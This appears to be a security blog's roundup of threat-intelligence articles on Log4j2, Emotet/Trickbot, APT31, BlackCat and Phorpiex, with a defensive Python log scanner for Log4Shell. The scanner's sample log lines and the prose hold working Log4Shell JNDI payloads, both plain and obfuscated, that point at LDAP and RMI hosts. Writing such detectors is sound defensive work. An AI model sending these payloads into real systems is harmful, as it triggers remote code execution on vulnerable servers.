Over the last two weeks, the Log4j2 vulnerability dominated the news: NetLab reported ten families of malicious samples spreading through it, including Mirai and Muhstik botnet samples propagating via the Log4j2 RCE vulnerability, and Bitdefender published a technical advisory on the zero-day critical vulnerability in Log4j2 being exploited in the wild. Both are summarized below.

For more articles, check out our #onpatrol4malware blog.

Ransomware playbook ITSM.00.099

Source: Government of Canada

Ransomware is a type of malware that denies a user’s access to a system or data until a sum of money is paid. It is a serious and evolving threat to Canadians. The impact of ransomware can be devastating to organizations. Read more.

Ten families of malicious samples are spreading using the Log4j2 vulnerability Now

Source: NetLab

On December 11, 2021, at 8:00 pm, NetLab published a blog disclosing Mirai and Muhstik botnet samples propagating through the Log4j2 RCE vulnerability. Read more.

When old friends meet again: why Emotet chose Trickbot for rebirth

Source: Check Point Research

Trickbot and Emotet are considered some of the largest botnets in history. They both share a similar story: they were taken down and made a comeback. Check Point Research observed Trickbot’s activities after the takedown operation. Read more.

Technical Advisory: Zero-day critical vulnerability in Log4j2 exploited in the wild

Source: Bitdefender

On December 9, 2021, Apache disclosed CVE-2021-44228, a remote code execution vulnerability in Log4j2 assigned a CVSS score of 10 (the highest possible risk score). Read more.
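Because CVE-2021-44228 is triggered by a JNDI lookup string (for example `${jndi:ldap://attacker/a}`) landing in any logged field, and because in-the-wild exploitation quickly moved to nested-lookup obfuscation (`${${lower:j}ndi:...}`, `${::-j}`, `${env:NaN:-j}`), the first check most responders wanted was a scan of existing web logs for these strings. The script below is an added example written for this page, not code from the Bitdefender advisory or from Apache. It folds the common nested-lookup tricks back into plain text before matching, and runs over constructed sample access-log lines (the IPs and paths are made up); the `lower:`/`upper:`/`:-` rewrite rules cover only the obfuscation variants listed above and are an assumption about what is worth normalizing, not an implementation of Log4j's full lookup grammar.

```python
import re

# Constructed sample access-log lines (not from the advisory): a plain JNDI lookup
# in the User-Agent field, a benign request, and two obfuscated lookups.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.6 - - [10/Dec/2021:03:14:09 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:03:15:21 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${lower:j}${lower:n}${lower:d}i:${lower:l}dap://203.0.113.7:1389/b}"',
    '10.0.0.8 - - [10/Dec/2021:03:16:02 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${env:NaN:-r}mi://203.0.113.9/c}"',
]

# Innermost ${...} lookup: a body containing no nested "$", "{" or "}".
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# Permissive match for the final JNDI lookup; group 1 is the scheme (ldap, rmi, dns, ...).
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def _resolve_lookup(body: str, raw: str) -> str:
    """Rewrite one innermost lookup the way the obfuscation variants rely on.

    Assumed rules (detection normalization only, not Log4j's real resolver):
      ${lower:X}      -> x          ${upper:X} -> X
      ${name:-X}      -> X          (unresolvable name falls back to its default)
      ${jndi:...}     -> unchanged  (this is what we are looking for)
      anything else   -> unchanged
    """
    lowered = body.lower()
    if lowered.startswith("jndi:"):
        return raw
    if ":-" in body:
        return body.partition(":-")[2]
    if lowered.startswith("lower:"):
        return body[len("lower:"):].lower()
    if lowered.startswith("upper:"):
        return body[len("upper:"):].upper()
    return raw


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Collapse nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        rewritten = INNER_LOOKUP.sub(lambda m: _resolve_lookup(m.group(1), m.group(0)), text)
        if rewritten == text:
            break
        text = rewritten
    return text


def find_jndi_lookups(line: str) -> list:
    """Return the lowercased JNDI schemes found in a line after de-obfuscation."""
    return [m.group(1).lower() for m in JNDI_PATTERN.finditer(normalize_lookups(line))]


def scan_log_lines(lines) -> list:
    """Return (line_index, [schemes]) for every line carrying a JNDI lookup."""
    hits = []
    for index, line in enumerate(lines):
        schemes = find_jndi_lookups(line)
        if schemes:
            hits.append((index, schemes))
    return hits


if __name__ == "__main__":
    for index, schemes in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {index}: JNDI lookup via {', '.join(schemes)}")
        print("  normalized:", normalize_lookups(SAMPLE_LOG_LINES[index]))
```

Run it against real access logs by replacing `SAMPLE_LOG_LINES` with lines read from a file; a hit only tells you an attempt reached a logged field, so confirming exploitation still requires checking for outbound LDAP/RMI connections from the JVM host around that timestamp.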

APT31 INTRUSION SET CAMPAIGN

Source: ANSSI

In January 2021, ANSSI was informed of a large campaign of attacks against French entities linked to the APT31 intrusion set. The investigations carried out by ANSSI led to the analysis of the intrusion set's entire chain of infection. Read more.

ALPHV BlackCat – This year’s most sophisticated ransomware

Source: BleepingComputer

The new ALPHV ransomware operation, aka BlackCat, launched last month and could be the most sophisticated ransomware of the year, with a highly-customizable feature set allowing for attacks on a wide range of corporate environments. Read more.

Phorpiex botnet is back with a new Twizt: Hijacking Hundreds of crypto transactions

Source: Check Point Research

CPR spotted the resurgence of Phorpiex, an old threat known for its sextortion spam campaigns, crypto-jacking, cryptocurrency clipping, and ransomware spread. Read more.